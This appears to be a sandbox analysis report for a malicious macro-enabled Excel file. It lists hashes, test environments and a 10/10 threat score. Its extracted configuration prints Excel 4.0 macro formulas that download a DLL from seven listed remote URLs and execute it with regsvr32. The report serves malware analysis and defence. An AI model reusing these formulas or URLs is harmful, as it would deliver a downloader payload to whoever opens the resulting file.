General
-
Target
5df125e34d80cb2d69bf1decda461cb7b8663c4a739050ca3a1a0a8b06c0a2d1
-
Size
20KB
-
Sample
241120-gbl4sssgrj
-
MD5
ec54c5a515df08c95080df4bd69b8b47
-
SHA1
f6895f5c64dff0303e27fdebfcc93b6f18ae68aa
-
SHA256
5df125e34d80cb2d69bf1decda461cb7b8663c4a739050ca3a1a0a8b06c0a2d1
-
SHA512
c4d29545642e952f012e0d17747ac95e961bed0ecccf58637222c9059ea760ebb6a4d43d3837265572cb3ad33b4445bf28f662e5c9606c4b0579643845eb3dcc
-
SSDEEP
384:0HTyVb1GNjyo4CGzPd6ZIwGdKb5CzgObff9kC+xbX7zUSA:guIN+o4FLYCBn9kC+xbLzK
Behavioral task
behavioral1
Sample
5df125e34d80cb2d69bf1decda461cb7b8663c4a739050ca3a1a0a8b06c0a2d1.xlsm
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
5df125e34d80cb2d69bf1decda461cb7b8663c4a739050ca3a1a0a8b06c0a2d1.xlsm
Resource
win10v2004-20241007-en
Malware Config
Extracted
http://osmani.atwebpages.com/wp-content/Ynwrr/
https://50-50aravidis.gr/thesi/wmL/
https://amplamaisbeneficios.com.br/contratos/MWnnZG/
http://bcingenieria.es/phpmailer/Z7fmcI7Va/
http://bredabeeld.nl/OLD/eavGp2KOdwXT/
http://www.cagataygunes.com.tr/stylesheets/uqK4kfhG4RAuRIA2/
http://kogelvanger.nl/picture_library/1MNqKan2FhWtQg5Uacu/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://osmani.atwebpages.com/wp-content/Ynwrr/","..\kytk.dll",0,0) =IF('SCWVCV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://50-50aravidis.gr/thesi/wmL/","..\kytk.dll",0,0)) =IF('SCWVCV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://amplamaisbeneficios.com.br/contratos/MWnnZG/","..\kytk.dll",0,0)) =IF('SCWVCV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bcingenieria.es/phpmailer/Z7fmcI7Va/","..\kytk.dll",0,0)) =IF('SCWVCV'!D20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bredabeeld.nl/OLD/eavGp2KOdwXT/","..\kytk.dll",0,0)) =IF('SCWVCV'!D22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.cagataygunes.com.tr/stylesheets/uqK4kfhG4RAuRIA2/","..\kytk.dll",0,0)) =IF('SCWVCV'!D24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://kogelvanger.nl/picture_library/1MNqKan2FhWtQg5Uacu/","..\kytk.dll",0,0)) =IF('SCWVCV'!D26<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\kytk.dll") =RETURN()
Extracted
http://osmani.atwebpages.com/wp-content/Ynwrr/
https://50-50aravidis.gr/thesi/wmL/
https://amplamaisbeneficios.com.br/contratos/MWnnZG/
Targets
-
-
Target
5df125e34d80cb2d69bf1decda461cb7b8663c4a739050ca3a1a0a8b06c0a2d1
-
Size
20KB
-
MD5
ec54c5a515df08c95080df4bd69b8b47
-
SHA1
f6895f5c64dff0303e27fdebfcc93b6f18ae68aa
-
SHA256
5df125e34d80cb2d69bf1decda461cb7b8663c4a739050ca3a1a0a8b06c0a2d1
-
SHA512
c4d29545642e952f012e0d17747ac95e961bed0ecccf58637222c9059ea760ebb6a4d43d3837265572cb3ad33b4445bf28f662e5c9606c4b0579643845eb3dcc
-
SSDEEP
384:0HTyVb1GNjyo4CGzPd6ZIwGdKb5CzgObff9kC+xbX7zUSA:guIN+o4FLYCBn9kC+xbLzK
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-